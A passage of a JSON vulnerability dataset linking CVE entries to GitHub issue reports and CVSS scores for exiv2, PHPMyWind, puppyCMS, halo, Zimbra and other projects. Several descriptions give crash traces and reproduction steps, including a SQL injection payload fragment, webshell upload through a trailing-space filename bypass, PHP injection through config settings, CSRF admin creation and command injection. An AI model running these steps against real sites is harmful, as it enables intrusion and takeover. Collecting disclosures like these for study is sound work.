  50253. "description": "one global buffer overread in APITAG in APITAG POC: FILETAG There exists one global buffer overread in APITAG in nikonmn_int.cpp in exi NUMBERTAG which could result in information leak. exi NUMBERTAG pt $poc NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG b NUMBERTAG d NUMBERTAG at pc NUMBERTAG b6efa9f3 bp NUMBERTAG bfc NUMBERTAG sp NUMBERTAG bfc NUMBERTAG READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG d NUMBERTAG thread T NUMBERTAG b6efa9f2 in APITAG APITAG const&, APITAG const ) PATHTAG NUMBERTAG b NUMBERTAG efc in APITAG APITAG const ) const PATHTAG NUMBERTAG b NUMBERTAG d6c1c in APITAG const ) const PATHTAG NUMBERTAG ef in APITAG const&, APITAG const ) PATHTAG NUMBERTAG d2d in APITAG const ) PATHTAG NUMBERTAG fabf1 in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG const&) PATHTAG NUMBERTAG d3aa5 in main PATHTAG NUMBERTAG b NUMBERTAG aaf2 ( PATHTAG NUMBERTAG d1af4 in _start ( PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG is located NUMBERTAG bytes to the left of global variable APITAG from PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG of size NUMBERTAG b NUMBERTAG d NUMBERTAG is located NUMBERTAG bytes to the right of global variable APITAG from PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG of size NUMBERTAG SUMMARY: APITAG global buffer overflow PATHTAG APITAG APITAG const&, APITAG const ) Shadow bytes around the buggy address NUMBERTAG ed NUMBERTAG f9 f9 f NUMBERTAG ed NUMBERTAG f9 f9 f9 f NUMBERTAG ed NUMBERTAG ed NUMBERTAG ed NUMBERTAG f9 f9 f NUMBERTAG ed NUMBERTAG a0: f9 f9 f9 f9 f9 f9[f9]f9 f9 f9 f9 f NUMBERTAG ed NUMBERTAG b NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG ed NUMBERTAG c NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG ed NUMBERTAG d NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG ed NUMBERTAG e NUMBERTAG ed NUMBERTAG f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left 
redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 APITAG internal: fe NUMBERTAG ABORTING",
  50254. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  50255. "severity": "HIGH",
  50256. "baseScore": 8.1,
  50257. "impactScore": 5.2,
  50258. "exploitabilityScore": 2.8
  50259. },
  50260. {
  50261. "CVE_ID": "CVE-2020-18773",
  50262. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/760",
  50263. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/760",
  50264. "Repo_new": "exiv2/exiv2",
  50265. "Issue_Created_At": "2019-03-26T01:30:40Z",
  50266. "description": "one invalid memory access in decode function in APITAG POC: FILETAG gdb args ./exi NUMBERTAG pt ~/segment_poc Program received signal SIGSEGV, Segmentation fault NUMBERTAG b7c NUMBERTAG d6 in APITAG APITAG APITAG out>, size=<optimized out>) at PATHTAG NUMBERTAG if ( APITAG != marker_) continue; (gdb) bt NUMBERTAG b7c NUMBERTAG d6 in APITAG APITAG APITAG out>, size=<optimized out>) at PATHTAG NUMBERTAG b7e NUMBERTAG in APITAG (this=<optimized out>, object NUMBERTAG at PATHTAG NUMBERTAG b7e NUMBERTAG in APITAG (this=<optimized out>, object=<optimized out>) at PATHTAG NUMBERTAG APITAG (this=<optimized out>, object=<optimized out>) at PATHTAG NUMBERTAG b7e NUMBERTAG e2a in APITAG (this NUMBERTAG cbf NUMBERTAG isitor=...) at PATHTAG NUMBERTAG b7e NUMBERTAG a in operator (this=<optimized out>, visitor=..., this=<optimized out>) at PATHTAG NUMBERTAG APITAG (this=<optimized out>, visitor=...) at PATHTAG NUMBERTAG b7e NUMBERTAG dae in APITAG (this NUMBERTAG cbd NUMBERTAG isitor=...) at PATHTAG NUMBERTAG b7e NUMBERTAG f NUMBERTAG in APITAG APITAG APITAG APITAG APITAG out>, size=<optimized out>, root=<optimized out>, APITAG out>, APITAG out>) at PATHTAG NUMBERTAG b7cf NUMBERTAG be in APITAG (this=<optimized out>) at PATHTAG NUMBERTAG e NUMBERTAG in APITAG (this NUMBERTAG cbb NUMBERTAG at PATHTAG NUMBERTAG c NUMBERTAG in APITAG (this NUMBERTAG cbb NUMBERTAG PATHTAG ) at PATHTAG NUMBERTAG dd9b in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG",
  50267. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  50268. "severity": "MEDIUM",
  50269. "baseScore": 6.5,
  50270. "impactScore": 3.6,
  50271. "exploitabilityScore": 2.8
  50272. },
  50273. {
  50274. "CVE_ID": "CVE-2020-18774",
  50275. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/759",
  50276. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/759",
  50277. "Repo_new": "exiv2/exiv2",
  50278. "Issue_Created_At": "2019-03-26T01:26:12Z",
  50279. "description": "float point exception in APITAG function in APITAG POC: FILETAG gdb args ./exi NUMBERTAG pt ~/fpe_poc Program received signal SIGFPE, Arithmetic exception NUMBERTAG b7e0c1a2 in APITAG (os=..., value=...) at PATHTAG NUMBERTAG if (r.second NUMBERTAG return os << APITAG / r.second; (gdb) bt NUMBERTAG b7e0c1a2 in APITAG (os=..., value=...) at PATHTAG NUMBERTAG b7c NUMBERTAG f NUMBERTAG in APITAG (this NUMBERTAG d NUMBERTAG os=..., APITAG out>) at PATHTAG NUMBERTAG b7c NUMBERTAG in APITAG (this=<optimized out>, APITAG at PATHTAG NUMBERTAG ec in APITAG (this=<optimized out>, md=..., APITAG out>) at PATHTAG NUMBERTAG ff5c in APITAG (this=<optimized out>, image=<optimized out>) at PATHTAG NUMBERTAG e NUMBERTAG in APITAG (this NUMBERTAG cbb NUMBERTAG at PATHTAG NUMBERTAG c NUMBERTAG in APITAG (this NUMBERTAG cbb NUMBERTAG PATHTAG ) at PATHTAG NUMBERTAG dd9b in main (argc=<optimized out>, argv=<optimized out>) at PATHTAG",
  50280. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  50281. "severity": "MEDIUM",
  50282. "baseScore": 6.5,
  50283. "impactScore": 3.6,
  50284. "exploitabilityScore": 2.8
  50285. },
  50286. {
  50287. "CVE_ID": "CVE-2020-18875",
  50288. "Issue_Url_old": "https://github.com/dotCMS/core/issues/15882",
  50289. "Issue_Url_new": "https://github.com/dotcms/core/issues/15882",
  50290. "Repo_new": "dotcms/core",
  50291. "Issue_Created_At": "2019-01-24T13:46:13Z",
  50292. "description": "User Privileges in Velocity . Placeholder",
  50293. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  50294. "severity": "HIGH",
  50295. "baseScore": 8.8,
  50296. "impactScore": 5.9,
  50297. "exploitabilityScore": 2.8
  50298. },
  50299. {
  50300. "CVE_ID": "CVE-2020-18877",
  50301. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/175",
  50302. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/175",
  50303. "Repo_new": "wuzhicms/wuzhicms",
  50304. "Issue_Created_At": "2019-03-27T08:29:39Z",
  50305. "description": "wuzhicms NUMBERTAG PATHTAG SQL injection vulnerability. Hi: I found a SQL injection vulnerability in PATHTAG FILETAG The 'flag' parameter is not filtered for harmful input, so I can inject SQL. Payload like this: URLTAG xxxx' or APITAG or ' Result: FILETAG FILETAG Suggested fix: $flag = APITAG (sanitize the value, or use a parameterized query). Release Info NUMBERTAG author by: xijun. EMAILTAG .cn",
  50306. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  50307. "severity": "HIGH",
  50308. "baseScore": 7.5,
  50309. "impactScore": 3.6,
  50310. "exploitabilityScore": 3.9
  50311. },
  50312. {
  50313. "CVE_ID": "CVE-2020-18879",
  50314. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1011",
  50315. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1011",
  50316. "Repo_new": "bludit/bludit",
  50317. "Issue_Created_At": "2019-03-29T09:47:56Z",
  50318. "description": "A file upload vulnerability in PATHTAG Describe your problem: a file upload vulnerability in PATHTAG allows uploading a PHP file FILETAG Expected behavior: restrict the allowed upload file types. Actual behavior: a PHP file can be uploaded. Steps to reproduce the problem: I upload a PHP file FILETAG then visit FILETAG FILETAG Bludit version NUMBERTAG author by: xijun. EMAILTAG .cn",
  50319. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50320. "severity": "CRITICAL",
  50321. "baseScore": 9.8,
  50322. "impactScore": 5.9,
  50323. "exploitabilityScore": 3.9
  50324. },
  50325. {
  50326. "CVE_ID": "CVE-2020-18885",
  50327. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/4",
  50328. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/4",
  50329. "Repo_new": "gaozhifeng/phpmywind",
  50330. "Issue_Created_At": "2019-04-02T11:11:46Z",
  50331. "description": "I found PHP code execution in FILETAG at version NUMBERTAG Hi: I found PHP code execution in FILETAG at version NUMBERTAG Open FILETAG NUMBERTAG In the watermark settings, enter the payload FILETAG Watermark text: xxx' Text color: APITAG FILETAG NUMBERTAG Submit and visit the watermark settings; you can see the PHP code execute FILETAG because the payload is written into FILETAG FILETAG and FILETAG is included by require_once, so the PHP code executes FILETAG Suggested fix: strip or escape ' , \\, ;, (, ) before writing the setting to the config file. version NUMBERTAG author by xijun. EMAILTAG .cn I hope you can fix it",
  50332. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  50333. "severity": "HIGH",
  50334. "baseScore": 7.2,
  50335. "impactScore": 5.9,
  50336. "exploitabilityScore": 1.2
  50337. },
  50338. {
  50339. "CVE_ID": "CVE-2020-18886",
  50340. "Issue_Url_old": "https://github.com/gaozhifeng/PHPMyWind/issues/5",
  50341. "Issue_Url_new": "https://github.com/gaozhifeng/phpmywind/issues/5",
  50342. "Repo_new": "gaozhifeng/phpmywind",
  50343. "Issue_Created_At": "2019-04-02T11:57:38Z",
  50344. "description": "I found an upload vulnerability FILETAG getshell at version NUMBERTAG Log in as admin NUMBERTAG Visit website settings, upload type, and add PHP (with a trailing space) FILETAG because Windows strips the trailing space from a file name, this bypasses the suffix check NUMBERTAG Upload a PHP file like APITAG name FILETAG FILETAG with a trailing space added to the filename; you can see the upload succeed FILETAG NUMBERTAG Visit the link and you can see the PHP code execute FILETAG because at PATHTAG FILETAG you do not validate the input filename, so applying trim(filename) before the suffix check would help. author by xijun. EMAILTAG .cn version NUMBERTAG",
  50345. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  50346. "severity": "HIGH",
  50347. "baseScore": 7.2,
  50348. "impactScore": 5.9,
  50349. "exploitabilityScore": 1.2
  50350. },
  50351. {
  50352. "CVE_ID": "CVE-2020-18888",
  50353. "Issue_Url_old": "https://github.com/choregus/puppyCMS/issues/15",
  50354. "Issue_Url_new": "https://github.com/choregus/puppycms/issues/15",
  50355. "Repo_new": "choregus/puppycms",
  50356. "Issue_Created_At": "2019-03-27T15:55:43Z",
  50357. "description": "There is an Arbitrary File Deletion vulnerability that can remove any file or folder without admin login. The vulnerable file is PATHTAG No admin login is needed; just open the following page. APITAG delete file/folder ERRORTAG",
  50358. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  50359. "severity": "HIGH",
  50360. "baseScore": 7.5,
  50361. "impactScore": 3.6,
  50362. "exploitabilityScore": 3.9
  50363. },
  50364. {
  50365. "CVE_ID": "CVE-2020-18889",
  50366. "Issue_Url_old": "https://github.com/choregus/puppyCMS/issues/13",
  50367. "Issue_Url_new": "https://github.com/choregus/puppycms/issues/13",
  50368. "Repo_new": "choregus/puppycms",
  50369. "Issue_Created_At": "2019-03-27T15:44:47Z",
  50370. "description": "There is a CSRF vulnerability that can change the admin's password. The admin default password is puppycms. The vulnerable file is PATHTAG While the admin is logged in, open the following page. PoC: APITAG change the admin's password ERRORTAG",
  50371. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  50372. "severity": "MEDIUM",
  50373. "baseScore": 6.5,
  50374. "impactScore": 3.6,
  50375. "exploitabilityScore": 2.8
  50376. },
  50377. {
  50378. "CVE_ID": "CVE-2020-18890",
  50379. "Issue_Url_old": "https://github.com/choregus/puppyCMS/issues/14",
  50380. "Issue_Url_new": "https://github.com/choregus/puppycms/issues/14",
  50381. "Repo_new": "choregus/puppycms",
  50382. "Issue_Created_At": "2019-03-27T15:50:21Z",
  50383. "description": "There is an RCE vulnerability that can upload a webshell without admin login. The vulnerable file is PATHTAG No admin login is needed; just open the following page. APITAG getshell ERRORTAG",
  50384. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50385. "severity": "CRITICAL",
  50386. "baseScore": 9.8,
  50387. "impactScore": 5.9,
  50388. "exploitabilityScore": 3.9
  50389. },
  50390. {
  50391. "CVE_ID": "CVE-2020-18897",
  50392. "Issue_Url_old": "https://github.com/libyal/libpff/issues/62",
  50393. "Issue_Url_new": "https://github.com/libyal/libpff/issues/62",
  50394. "Repo_new": "libyal/libpff",
  50395. "Issue_Created_At": "2018-06-23T06:52:35Z",
  50396. "description": "APITAG heap use after free at APITAG POC files: FILETAG FILETAG APITAG output: URLTAG URLTAG",
  50397. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50398. "severity": "HIGH",
  50399. "baseScore": 7.8,
  50400. "impactScore": 5.9,
  50401. "exploitabilityScore": 1.8
  50402. },
  50403. {
  50404. "CVE_ID": "CVE-2020-18897",
  50405. "Issue_Url_old": "https://github.com/libyal/libpff/issues/61",
  50406. "Issue_Url_new": "https://github.com/libyal/libpff/issues/61",
  50407. "Repo_new": "libyal/libpff",
  50408. "Issue_Created_At": "2018-06-23T06:51:13Z",
  50409. "description": "APITAG heap use after free at APITAG POC files: FILETAG FILETAG APITAG output: URLTAG URLTAG",
  50410. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50411. "severity": "HIGH",
  50412. "baseScore": 7.8,
  50413. "impactScore": 5.9,
  50414. "exploitabilityScore": 1.8
  50415. },
  50416. {
  50417. "CVE_ID": "CVE-2020-18898",
  50418. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/741",
  50419. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/741",
  50420. "Repo_new": "exiv2/exiv2",
  50421. "Issue_Created_At": "2019-03-13T08:57:11Z",
  50422. "description": "FILETAG The ASAN dumps the stack trace as follows: ERRORTAG",
  50423. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  50424. "severity": "MEDIUM",
  50425. "baseScore": 6.5,
  50426. "impactScore": 3.6,
  50427. "exploitabilityScore": 2.8
  50428. },
  50429. {
  50430. "CVE_ID": "CVE-2020-18899",
  50431. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/742",
  50432. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/742",
  50433. "Repo_new": "exiv2/exiv2",
  50434. "Issue_Created_At": "2019-03-13T12:11:16Z",
  50435. "description": "Program crash due to uncontrolled memory allocation on function APITAG APITAG sizeof(box)). Hi there, An issue was discovered in APITAG APITAG sizeof(box)) function in APITAG as distributed in master and version NUMBERTAG There is an uncontrolled memory allocation problem, leading to a program crash. I have also confirmed this issue by using APITAG Here is the POC file. Please use the \u201c./exi NUMBERTAG pX $POC\u201d to reproduce the bug. FILETAG ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
  50436. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  50437. "severity": "MEDIUM",
  50438. "baseScore": 6.5,
  50439. "impactScore": 3.6,
  50440. "exploitabilityScore": 2.8
  50441. },
  50442. {
  50443. "CVE_ID": "CVE-2020-18900",
  50444. "Issue_Url_old": "https://github.com/libyal/libexe/issues/1",
  50445. "Issue_Url_new": "https://github.com/libyal/libexe/issues/1",
  50446. "Repo_new": "libyal/libexe",
  50447. "Issue_Created_At": "2018-09-01T06:46:32Z",
  50448. "description": "Multiple heap buffer overflow errors inside function APITAG in libexe_io_handle.c. Multiple heap buffer overflow errors inside function APITAG in libexe_io_handle.c We found with our fuzzer multiple heap buffer overflow errors inside function APITAG The version we use is \"exeinfo NUMBERTAG These can be triggered when compiled with address sanitizer and run with exe file. Here is the POC files: FILETAG For example: ERRORTAG And ERRORTAG",
  50449. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
  50450. "severity": "LOW",
  50451. "baseScore": 3.3,
  50452. "impactScore": 1.4,
  50453. "exploitabilityScore": 1.8
  50454. },
  50455. {
  50456. "CVE_ID": "CVE-2020-18964",
  50457. "Issue_Url_old": "https://github.com/saysky/ForestBlog/issues/20",
  50458. "Issue_Url_new": "https://github.com/saysky/forestblog/issues/20",
  50459. "Repo_new": "saysky/forestblog",
  50460. "Issue_Created_At": "2019-04-04T05:09:18Z",
  50461. "description": "There is a CSRF vulnerability. CSRF vulnerability: if the admin user clicks a phishing link provided by the attacker, it creates a new user that can log in to the website management background. I reviewed the code in the project and found that the code where the admin adds other users has no protection against Cross-Site Request Forgery. FILETAG FILETAG So I used Burp to generate the CSRF PoC. FILETAG FILETAG Then, if the admin clicks the button (the CSRF link), it creates a new user admin2 on the website. FILETAG admin2 can log in to the website background. FILETAG In further testing, this vulnerability can also be used to delete users on the website.",
  50462. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  50463. "severity": "HIGH",
  50464. "baseScore": 8.8,
  50465. "impactScore": 5.9,
  50466. "exploitabilityScore": 2.8
  50467. },
  50468. {
  50469. "CVE_ID": "CVE-2020-18976",
  50470. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/556",
  50471. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/556",
  50472. "Repo_new": "appneta/tcpreplay",
  50473. "Issue_Created_At": "2019-05-07T12:23:01Z",
  50474. "description": "Bug]. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug: There is an out-of-bounds (buffer overflow) write at APITAG , downloaded at the latest commit APITAG The code near APITAG is shown below. The code does not check that the packet data is long enough to hold the IP and TCP headers before writing to them. When running the PoC, the data length is smaller than even the IP header, so an out-of-bounds write is reported when the TCP header is written. CODETAG To Reproduce Steps to reproduce the behavior NUMBERTAG download the code from commit APITAG (master head now NUMBERTAG download FILETAG NUMBERTAG Compile the program with APITAG NUMBERTAG Execute APITAG Expected behavior: A buffer overflow write is reported by ASAN, as shown in the screenshots section below. Screenshots ERRORTAG System (please complete the following information): OS: ubuntu linux OS version NUMBERTAG generic NUMBERTAG Ubuntu SMP Thu Oct NUMBERTAG UTC NUMBERTAG APITAG Tcpreplay Version : master head at NUMBERTAG commit APITAG",
  50475. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  50476. "severity": "MEDIUM",
  50477. "baseScore": 5.5,
  50478. "impactScore": 3.6,
  50479. "exploitabilityScore": 1.8
  50480. },
  50481. {
  50482. "CVE_ID": "CVE-2020-18979",
  50483. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/126",
  50484. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/126",
  50485. "Repo_new": "halo-dev/halo",
  50486. "Issue_Created_At": "2019-04-04T02:46:43Z",
  50487. "description": "There is a stored XSS vulnerability. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) x] BUG \u53cd\u9988 [ ] \u6dfb\u52a0\u65b0\u7684\u7279\u6027\u6216\u8005\u529f\u80fd [ ] \u8bf7\u6c42\u6280\u672f\u652f\u6301 In [issue NUMBERTAG URLTAG , someone reported two stored XSS issues and you fixed them, but the second XSS still has another output point APITAG that is not covered by the fix. Payload HTTP Requests ERRORTAG APITAG APITAG",
  50488. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50489. "severity": "MEDIUM",
  50490. "baseScore": 6.1,
  50491. "impactScore": 2.7,
  50492. "exploitabilityScore": 2.8
  50493. },
  50494. {
  50495. "CVE_ID": "CVE-2020-18980",
  50496. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/134",
  50497. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/134",
  50498. "Repo_new": "halo-dev/halo",
  50499. "Issue_Created_At": "2019-04-04T08:32:35Z",
  50500. "description": "Remote Code Execution in your system. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) [x] BUG \u53cd\u9988 [ ] \u6dfb\u52a0\u65b0\u7684\u7279\u6027\u6216\u8005\u529f\u80fd [ ] \u8bf7\u6c42\u6280\u672f\u652f\u6301 Bug Report: I read the code and found that function APITAG makes a system call as ERRORTAG in ERRORTAG and you do nothing to validate the APITAG and APITAG , so I can type in APITAG and APITAG is APITAG , leading to RCE (command injection through the unsanitized arguments). CODETAG",
  50501. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  50502. "severity": "CRITICAL",
  50503. "baseScore": 9.8,
  50504. "impactScore": 5.9,
  50505. "exploitabilityScore": 3.9
  50506. },
  50507. {
  50508. "CVE_ID": "CVE-2020-18982",
  50509. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/127",
  50510. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/127",
  50511. "Repo_new": "halo-dev/halo",
  50512. "Issue_Created_At": "2019-04-04T03:19:25Z",
  50513. "description": "These is Another stored xss vulnerability. APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG x] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG but do nothing with APITAG FILETAG payload: ERRORTAG \\ APITAG ERRORTAG in uri APITAG APITAG",
  50514. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  50515. "severity": "MEDIUM",
  50516. "baseScore": 5.4,
  50517. "impactScore": 2.7,
  50518. "exploitabilityScore": 2.3
  50519. },
  50520. {
  50521. "CVE_ID": "CVE-2020-18984",
  50522. "Issue_Url_old": "https://github.com/buxu/bug/issues/2",
  50523. "Issue_Url_new": "https://github.com/buxu/bug/issues/2",
  50524. "Repo_new": "buxu/bug",
  50525. "Issue_Created_At": "2019-04-05T08:23:35Z",
  50526. "description": "Reflected XSS via Host header injection on Zimbra . Affected product: Zimbra Collaboration Version testing NUMBERTAG latest version) Affected function: PATHTAG OS: Centos7 FILETAG",
  50527. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50528. "severity": "MEDIUM",
  50529. "baseScore": 6.1,
  50530. "impactScore": 2.7,
  50531. "exploitabilityScore": 2.8
  50532. },
  50533. {
  50534. "CVE_ID": "CVE-2020-18985",
  50535. "Issue_Url_old": "https://github.com/buxu/bug/issues/3",
  50536. "Issue_Url_new": "https://github.com/buxu/bug/issues/3",
  50537. "Repo_new": "buxu/bug",
  50538. "Issue_Created_At": "2019-04-05T08:45:33Z",
  50539. "description": "Open Redirect vulnerability on Zimbra. Affected product: Zimbra Collaboration Version testing NUMBERTAG latest version) Affected function: URLTAG OS: Centos7 FILETAG",
  50540. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50541. "severity": "MEDIUM",
  50542. "baseScore": 6.1,
  50543. "impactScore": 2.7,
  50544. "exploitabilityScore": 2.8
  50545. },
  50546. {
  50547. "CVE_ID": "CVE-2020-18998",
  50548. "Issue_Url_old": "https://github.com/xpleaf/Blog_mini/issues/44",
  50549. "Issue_Url_new": "https://github.com/xpleaf/blog_mini/issues/44",
  50550. "Repo_new": "xpleaf/blog_mini",
  50551. "Issue_Created_At": "2019-04-09T06:55:36Z",
  50552. "description": "Two Cross Site Scripting vulnerabilities in latest release NUMBERTAG A Cross site scripting on Add plugin Description: Cross site scripting (XSS) vulnerability in PATHTAG line NUMBERTAG APITAG | safe }} The jinja2 safe filter marks the content as trusted, so it is rendered without escaping, resulting in a Cross site scripting (XSS) vulnerability. Steps To Reproduce: After the administrator has logged in. Url : URLTAG Data APITAG APITAG FILETAG Go back to the homepage FILETAG FILETAG NUMBERTAG A Cross site scripting on Add Article Description: Cross site scripting (XSS) vulnerability in PATHTAG line NUMBERTAG APITAG | safe }} The jinja2 safe filter marks the content as trusted, so it is rendered without escaping, resulting in a Cross site scripting (XSS) vulnerability. Steps To Reproduce: After the administrator has logged in. URL URLTAG Data: APITAG APITAG &types NUMBERTAG summary=test FILETAG Go back to the homepage and click on the article; this will trigger the XSS URLTAG FILETAG",
  50553. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50554. "severity": "MEDIUM",
  50555. "baseScore": 6.1,
  50556. "impactScore": 2.7,
  50557. "exploitabilityScore": 2.8
  50558. },
  50559. {
  50560. "CVE_ID": "CVE-2020-19000",
  50561. "Issue_Url_old": "https://github.com/tankywoo/simiki/issues/123",
  50562. "Issue_Url_new": "https://github.com/tankywoo/simiki/issues/123",
  50563. "Repo_new": "tankywoo/simiki",
  50564. "Issue_Created_At": "2019-04-15T12:27:24Z",
  50565. "description": "Simiki NUMBERTAG xss + rce. APITAG Examples: APITAG FILETAG The affected file appears to be FILETAG Line NUMBERTAG By default, jinja2 sets autoescape to False. Consider using APITAG or the select_autoescape function to mitigate XSS vulnerabilities NUMBERTAG rce FILETAG line NUMBERTAG Use of unsafe yaml load, which allows instantiation of arbitrary objects. Consider APITAG (a safe loader) instead. This can lead to remote code execution when simiki loads a malicious FILETAG file. Payload\uff1a APITAG When simiki is run again, it will load FILETAG and cause remote code execution FILETAG",
  50566. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50567. "severity": "MEDIUM",
  50568. "baseScore": 6.1,
  50569. "impactScore": 2.7,
  50570. "exploitabilityScore": 2.8
  50571. },
  50572. {
  50573. "CVE_ID": "CVE-2020-19002",
  50574. "Issue_Url_old": "https://github.com/stephenmcd/mezzanine/issues/1921",
  50575. "Issue_Url_new": "https://github.com/stephenmcd/mezzanine/issues/1921",
  50576. "Repo_new": "stephenmcd/mezzanine",
  50577. "Issue_Created_At": "2019-04-23T10:01:01Z",
  50578. "description": "mezzanine xss. Version NUMBERTAG My English is not good; the report is translated by Google. Reproducing the vulnerability: Vulnerability url: APITAG When adding a blog post, use Burp Suite to capture the request, modify the title to APITAG and the content to APITAG FILETAG Return to APITAG to trigger the XSS FILETAG The cause of the vulnerability is the description_from_content function of core/models.py, line NUMBERTAG where the value of title is used, resulting in XSS FILETAG",
  50579. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  50580. "severity": "MEDIUM",
  50581. "baseScore": 6.1,
  50582. "impactScore": 2.7,
  50583. "exploitabilityScore": 2.8
  50584. },
  50585. {
  50586. "CVE_ID": "CVE-2020-19003",
  50587. "Issue_Url_old": "https://github.com/liftoff/GateOne/issues/728",
  50588. "Issue_Url_new": "https://github.com/liftoff/gateone/issues/728",
  50589. "Repo_new": "liftoff/gateone",
  50590. "Issue_Created_At": "2019-04-09T07:10:01Z",
